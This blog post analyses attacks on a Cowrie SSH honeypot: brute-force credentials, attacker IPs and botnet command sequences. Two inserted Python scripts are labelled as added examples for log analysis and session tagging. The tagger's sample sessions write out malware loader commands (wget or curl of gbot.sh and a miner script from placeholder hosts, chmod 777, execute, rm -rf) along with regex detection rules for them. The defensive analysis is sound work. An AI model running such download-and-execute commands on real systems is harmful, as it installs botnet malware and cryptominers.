T-pot: Cowrie Honeypot Analysis

Ashlyn Matthews
6 min read · Feb 18, 2022


Overview

After several days online, my T-Pot saw a number of attacks. In my previous post I explained the T-Pot setup; this post focuses on attacks captured by the Cowrie honeypot. Cowrie specifically captures SSH and Telnet connections, logging brute-force attempts and shell interaction.

To conduct the analysis I mostly use the ELK stack (also known as the Elastic Stack), which is built into the T-Pot platform. The Elastic Stack ingests data and searches, analyzes and visualizes it in real time. It is made up of three tools: Logstash, which collects and transforms data; Elasticsearch, which searches and analyzes it; and Kibana, which visualizes and manages it.

Cowrie

I decided to focus on a 24-hour interval that received a lot of traffic: Feb 10, 2022 @04:00:00 to Feb 11, 2022 @04:00:00. According to the Kibana dashboard, during this interval my Cowrie honeypot received 4,563 attacks, predominantly attempting to exploit an SSH vulnerability. The dashboard suggested that most of the attacks were coming from Russia and China. I continued to scroll through the dashboard to the top 10 attacker source IPs and decided to start my investigation there.

Who are the attackers

I decided to focus on the top three attackers in this list, as their attack counts were significantly higher than the rest: 116.105.212.31, 116.98.60.69 and 116.98.166.90. According to Talos Intelligence, all three come from Da Nang, Vietnam, and the network owner is Viettel Corporation. All three have poor reputations and are recognized as the origin of a critical amount of spam. All except 116.98.166.90 appear on blocklists and are classified as attackers.

Attacks:

Usernames/passwords used in brute force attacks

The username and password tag clouds show the inputs attempted during the brute-force attacks. Brute forcing is the use of many username/password combinations to gain unauthorized access to the target system. Several of the password attempts are basic and appear on the common rockyou.txt list that comes preinstalled in Kali. This is a reminder of the importance of choosing a strong password, one that includes uppercase letters, lowercase letters and special characters.

Commands

To look into the commands that may have been run after gaining access, I went to the Discover view, which searches the data Logstash ingested. I filtered for the Cowrie honeypot and for events with a non-empty input. I grouped IP addresses by the commands they ran so that I could best investigate who the attackers were and what they were trying to do. I noticed numerous IP addresses issuing identical command sequences, which suggests botnet activity.
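The two steps above (reading the credential attempts behind the tag clouds, and grouping source IPs by the command sequence they typed) can be reproduced offline without Kibana. The script below is an added example, not code from the original post or from the Cowrie or T-Pot projects. It relies only on Cowrie's cowrie.json line format, one JSON object per line with the fields eventid, src_ip, session, username, password and input; the log lines and the 192.0.2.x addresses are constructed for illustration.

```python
"""Offline analysis of Cowrie JSON logs (added example, not from the post).

Cowrie writes one JSON object per line. Field names used here (eventid,
src_ip, session, username, password, input) match that format; the sample
lines and IP addresses below are constructed for illustration.
"""
import json
from collections import Counter, defaultdict

# Constructed sample log: two IPs running the same command sequence (s1, s2),
# one IP probing for a shell (s3), a repeat brute-force attempt (s4) and a
# non-JSON line that a robust parser must skip.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.10","session":"s1","username":"root","password":"123456"}
{"eventid":"cowrie.login.success","src_ip":"192.0.2.10","session":"s1","username":"root","password":"password"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.10","session":"s1","input":"uname -a"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.10","session":"s1","input":"cat /proc/cpuinfo"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.10","session":"s1","input":"ps | grep miner"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.10","session":"s1","input":"echo hi"}
{"eventid":"cowrie.login.success","src_ip":"192.0.2.11","session":"s2","username":"root","password":"password"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.11","session":"s2","input":"uname -a"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.11","session":"s2","input":"cat /proc/cpuinfo"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.11","session":"s2","input":"ps | grep miner"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.11","session":"s2","input":"echo hi"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.12","session":"s3","username":"admin","password":"admin"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.12","session":"s3","username":"root","password":"123456"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.12","session":"s3","input":"enable"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.12","session":"s3","input":"sh"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.10","session":"s4","username":"root","password":"123456"}
this line is not JSON and is skipped by the parser
"""

LOGIN_EVENTS = {"cowrie.login.failed", "cowrie.login.success"}


def parse_cowrie(text):
    """Parse cowrie.json lines into dicts, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict) and "eventid" in obj:
            events.append(obj)
    return events


def top_credentials(events, n=10):
    """Most common (username, password) pairs across all login attempts."""
    counts = Counter(
        (e.get("username", ""), e.get("password", ""))
        for e in events if e["eventid"] in LOGIN_EVENTS
    )
    return counts.most_common(n)


def top_sources(events, n=10):
    """Source IPs ranked by number of login attempts (the 'top attackers' list)."""
    counts = Counter(e["src_ip"] for e in events if e["eventid"] in LOGIN_EVENTS)
    return counts.most_common(n)


def command_sequences(events):
    """Map each session id to (ordered tuple of commands typed, source IP)."""
    seqs = defaultdict(list)
    src = {}
    for e in events:
        if e["eventid"] == "cowrie.command.input":
            seqs[e["session"]].append(e["input"])
            src[e["session"]] = e["src_ip"]
    return {s: (tuple(cmds), src[s]) for s, cmds in seqs.items()}


def shared_sequences(events, min_ips=2):
    """Command sequences issued verbatim by at least min_ips distinct IPs.

    Identical sequences from unrelated addresses are the botnet signal the
    post describes; sorted by number of IPs, most widespread first.
    """
    ips_by_seq = defaultdict(set)
    for seq, ip in command_sequences(events).values():
        ips_by_seq[seq].add(ip)
    hits = [(seq, sorted(ips)) for seq, ips in ips_by_seq.items() if len(ips) >= min_ips]
    hits.sort(key=lambda h: (-len(h[1]), h[0]))
    return hits


if __name__ == "__main__":
    evs = parse_cowrie(SAMPLE_LOG)
    print("top credentials:", top_credentials(evs, 3))
    print("top sources:", top_sources(evs, 3))
    for seq, ips in shared_sequences(evs):
        print(f"{len(ips)} IPs ran: {' ; '.join(seq)} -> {ips}")
```

To run it against a real T-Pot instance, replace SAMPLE_LOG with the contents of the Cowrie cowrie.json file (or a Logstash export of the same events); the session id ties each typed command back to the login that preceded it, which is what makes grouping by sequence rather than by single command meaningful.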

Cryptomining bots

Unfamiliar with several of the commands, I did a little research and found that the ‘/ip cloud print’ command targets MikroTik routers running RouterOS versions prior to 6.27. Ultimately the attackers are trying to identify the OS of the device, most likely to decide how to proceed with their attack. The attacker continued to gather information on the honeypot’s system with the commands ‘ifconfig’, ‘uname -a’ and ‘cat /proc/cpuinfo’. Then the attackers searched the system processes for the word ‘miner’, suggesting they were looking for cryptominers already on the system. Then they sought out specific files. Finally the attacker echoes ‘hi’, which indicates that it has already identified the honeypot.

I took a look at the next frequent command pattern.

/bin/busybox/

Due to the number of IP addresses issuing this series of commands, I am inclined to believe a botnet is responsible. BusyBox was a new term for me, so I started by looking into what it is. BusyBox is software that compiles many commands and other features into a single small executable. Such a tool is convenient for an attacker who wants to get exploits onto your device.

The attackers started off by trying to gain shell access. They ran several different commands that could possibly execute a shell, which suggests they weren’t sure which would work and had to verify. They then sought to display the file system’s storage devices, another way to learn more about the system they were attacking. Tftp and wget, commands typically used for downloading, were checked to see whether they could be executed. They then made a copy with dd (duplicate disk) of one block of 52 bytes. Then the attacker removed all of its data from the system.

gbot.sh

According to my research this is a known botnet malware. According to VirusTotal, it is associated with the Mirai malware, which infects devices and adds them to its botnet. Botnets are dangerous in that they are often used for denial of service (DoS) attacks. This attacker started off by trying to change into different directories, then tried to download malicious payloads from a server. It then attempted to open up the permissions of those payloads to make them readable, writable and executable by anyone. Finally they recursively removed the files they had downloaded.

c3pool, xmr miner

Upon looking at this command I inferred that the attacker attempted to download a cryptominer onto the system. I found that c3pool is a service that lets miners pool their processing power over a network to mine XMR (Monero), a popular cryptocurrency. The attacker starts off by changing to the /tmp directory, then makes a request in silent mode to a site for downloading the miner. Then they overrode all the settings and downloaded what I imagine to be a malicious payload.
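The four command patterns discussed above (the MikroTik/host reconnaissance with the ‘miner’ check, the BusyBox shell and download-tool probing, the download/chmod/remove loader behaviour of gbot.sh, and the /tmp plus silent-download cryptominer fetch) can be turned into ordered-pattern rules and run over a session's command list to tag it. The code below is an added example, not from the original post or any project it mentions; the rules are my own heuristics derived from the behaviour described in the post, and the four sample sessions, their 198.51.100.x hosts and file names are constructed for illustration.

```python
"""Tag honeypot sessions by the command patterns described in the post.

Added example, not from the post. A rule is a name plus a list of regexes
that must match commands in order (a subsequence of the session); one
command may satisfy several consecutive regexes. Sample sessions and hosts
are constructed for illustration.
"""
import re

# Rules derived from the behaviours the post describes, in the order it
# discusses them. These are illustrative heuristics, not a vendor ruleset.
RULES = [
    ("mikrotik-probe", [r"^/ip cloud print"]),
    ("host-recon", [r"^(uname -a|ifconfig|cat /proc/cpuinfo)"]),
    ("miner-check", [r"grep .*miner"]),
    ("busybox-probe", [r"^(enable|sh|shell)$", r"/bin/busybox"]),
    ("download-tool-check", [r"^/bin/busybox (tftp|wget)"]),
    # download, open permissions to everyone, then remove the evidence
    ("loader", [r"\b(wget|curl|tftp)\b", r"chmod\s+777", r"rm\s+-rf"]),
    # change to /tmp, silent download, reference to the pool or XMR
    ("cryptominer", [r"^cd /tmp", r"curl\s+-s", r"c3pool|xmr"]),
]


def rule_matches(commands, patterns):
    """True if every pattern matches some command, in order (subsequence)."""
    i = 0
    for cmd in commands:
        while i < len(patterns) and re.search(patterns[i], cmd):
            i += 1
        if i == len(patterns):
            return True
    return False


def tag_session(commands):
    """Return the names of all rules the command list satisfies, in RULES order."""
    return [name for name, patterns in RULES if rule_matches(commands, patterns)]


def tag_sessions(sessions):
    """Apply tag_session to a {session_id: [commands]} mapping."""
    return {sid: tag_session(cmds) for sid, cmds in sessions.items()}


# Constructed sample sessions modelled on the post's four command patterns.
SAMPLE_SESSIONS = {
    "recon": ["/ip cloud print", "ifconfig", "uname -a", "cat /proc/cpuinfo",
              "ps -ef | grep miner", "echo hi"],
    "busybox": ["enable", "sh", "shell", "/bin/busybox cat /proc/mounts",
                "/bin/busybox tftp", "/bin/busybox wget",
                "dd bs=52 count=1 if=/bin/sh", "rm -f .t"],
    "gbot": ["cd /tmp || cd /var/run", "wget http://198.51.100.7/gbot.sh",
             "chmod 777 gbot.sh", "sh gbot.sh", "rm -rf gbot.sh"],
    "c3pool": ["cd /tmp", "curl -s http://198.51.100.9/c3pool/xmr_miner.sh -o xmr.sh",
               "sh xmr.sh"],
}


if __name__ == "__main__":
    for sid, tags in tag_sessions(SAMPLE_SESSIONS).items():
        print(f"{sid:8s} -> {', '.join(tags) or 'untagged'}")
```

Ordered matching matters more than keyword matching here: ‘wget’ alone appears in the BusyBox capability probe as well as in the loader, but only the loader goes on to chmod 777 and rm -rf, so the ordered rule separates the two patterns that a plain keyword filter in Discover would lump together.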

I also noted that both source IPs, 179.43.187.95 and 179.43.175.170, have been flagged numerous times as malicious on VirusTotal and, according to WHOIS, originate from Latin America rather than Switzerland, as my collected data suggested. The source machine is likely using a VPN.

Debrief

The first thing that comes to mind as I consider how companies can mitigate these risks is that they should configure their security groups to restrict access. They should also close ports that are not in use. Because I configured the T-Pot to be very open, it made for a very vulnerable system. Several brute-force attempts took place, so a password policy that requires strong passwords would be very beneficial.

Final thoughts

This has been a pretty interesting project and there is still so much more I can do with the data I have found and I intend to. Thank you for reading. Feel free to follow if you like my content.
